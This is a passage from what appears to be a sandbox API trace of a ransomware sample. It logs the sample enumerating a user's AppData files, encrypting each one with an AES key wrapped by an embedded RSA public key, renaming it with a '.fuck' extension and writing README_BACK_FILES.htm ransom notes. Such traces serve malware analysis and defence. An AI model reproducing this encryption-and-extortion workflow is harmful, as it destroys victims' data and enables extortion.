lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.766] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.766] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.766] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.766] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x232, lpOverlapped=0x0) returned 1 [0265.766] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x232, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x240) returned 1 [0265.766] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x240, lpOverlapped=0x0) returned 1 [0265.766] CloseHandle (hObject=0x5d10) returned 1 [0265.766] CloseHandle (hObject=0x5d14) returned 1 [0265.767] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db"), bFailIfExists=0) returned 1 [0265.774] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db", dwFileAttributes=0x0) returned 1 [0265.774] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db.gsg")) returned 1 [0265.776] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db.fuck")) returned 1 [0265.777] CryptDestroyHash (hHash=0x2e7fb00) returned 1 [0265.777] CryptDestroyKey (hKey=0x2e7fc00) returned 1 [0265.777] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.778] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0265.778] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2e7fb00 [0265.778] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0265.778] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0265.778] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0265.778] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.778] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.778] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7fc00 [0265.779] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.779] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.779] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0265.779] GetLastError () returned 0x0 [0265.779] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log")) returned 0x20 [0265.781] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log", dwFileAttributes=0x80) returned 1 [0265.782] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.783] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.784] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log.gsg", dwFileAttributes=0x2) returned 1 [0265.784] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0265.786] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0265.786] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.786] CryptHashData (hHash=0x2e7eb80, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.786] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7eb80, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f240) returned 1 [0265.786] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.787] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0265.787] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e78740) returned 1 [0265.787] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78740, dwCertEncodingType=0x1, pInfo=0x2eb0dd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0e00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0e08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f540) returned 1 [0265.787] CryptEncrypt (in: hKey=0x2e7f540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0265.787] CryptEncrypt (in: hKey=0x2e7f540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77f48*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e77f48*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0265.787] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e77f48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e77f48*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0265.788] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x14, lpOverlapped=0x0) returned 1 [0265.789] CryptEncrypt (in: hKey=0x2e7f240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x14, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x20) returned 1 [0265.790] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x20, lpOverlapped=0x0) returned 1 [0265.790] CloseHandle (hObject=0x5d44) returned 1 [0265.790] CloseHandle (hObject=0x5d48) returned 1 [0265.790] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log"), bFailIfExists=0) returned 1 [0265.793] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log", dwFileAttributes=0x0) returned 1 [0265.793] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log.gsg")) returned 1 [0265.795] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\WINPROJ.EXE.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\winproj.exe.log.fuck")) returned 1 [0265.796] CryptDestroyHash (hHash=0x2e7eb80) returned 1 [0265.796] CryptDestroyKey (hKey=0x2e7f240) returned 1 [0265.796] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.796] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0265.796] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0265.797] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\readme_back_files.htm")) returned 0xffffffff [0265.797] AreFileApisANSI () returned 1 [0265.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0265.797] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\UsageLogs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\usagelogs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.798] GetFileType (hFile=0x5d3c) returned 0x1 [0265.798] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0265.799] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0265.799] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.799] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\readme_back_files.htm")) returned 0xffffffff [0265.799] AreFileApisANSI () returned 1 [0265.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0265.799] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v2.0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v2.0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0265.800] GetFileType (hFile=0x5d10) returned 0x1 [0265.800] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0265.801] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0265.801] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0265.802] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.802] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.802] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0265.802] GetLastError () returned 0x0 [0265.803] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log")) returned 0x20 [0265.804] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log", dwFileAttributes=0x80) returned 1 [0265.804] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.805] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.807] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log.gsg", dwFileAttributes=0x2) returned 1 [0265.807] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2e7a500) returned 1 [0265.809] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0265.810] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.810] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.810] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7ec80) returned 1 [0265.810] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.810] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0265.810] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2e77db0) returned 1 [0265.810] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77db0, dwCertEncodingType=0x1, pInfo=0x2eb0270*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb02a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb02a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f300) returned 1 [0265.810] CryptEncrypt (in: hKey=0x2e7f300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0265.810] CryptEncrypt (in: hKey=0x2e7f300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77ec0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e77ec0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0265.811] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e77ec0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e77ec0*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0265.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x2f4, lpOverlapped=0x0) returned 1 [0265.827] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x2f4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x300) returned 1 [0265.827] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x300, lpOverlapped=0x0) returned 1 [0265.829] CloseHandle (hObject=0x5d3c) returned 1 [0265.829] CloseHandle (hObject=0x5d48) returned 1 [0265.830] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log"), bFailIfExists=0) returned 1 [0265.832] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log", dwFileAttributes=0x0) returned 1 [0265.833] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log.gsg")) returned 1 [0265.834] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\ngen.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\ngen.log.fuck")) returned 1 [0265.835] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0265.835] CryptDestroyKey (hKey=0x2e7ec80) returned 1 [0265.835] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.836] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.836] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7ec80 [0265.837] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.837] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.837] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0265.837] GetLastError () returned 0x0 [0265.837] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log")) returned 0x20 [0265.839] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log", dwFileAttributes=0x80) returned 1 [0265.840] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.841] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\clr_v4.0\\usagelogs\\mmc.exe.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.841] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\mmc.exe.log.gsg", dwFileAttributes=0x2) returned 1 [0265.842] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0265.844] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0265.844] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.844] CryptHashData (hHash=0x2e7eb80, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.844] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7eb80, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f140) returned 1 [0265.844] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 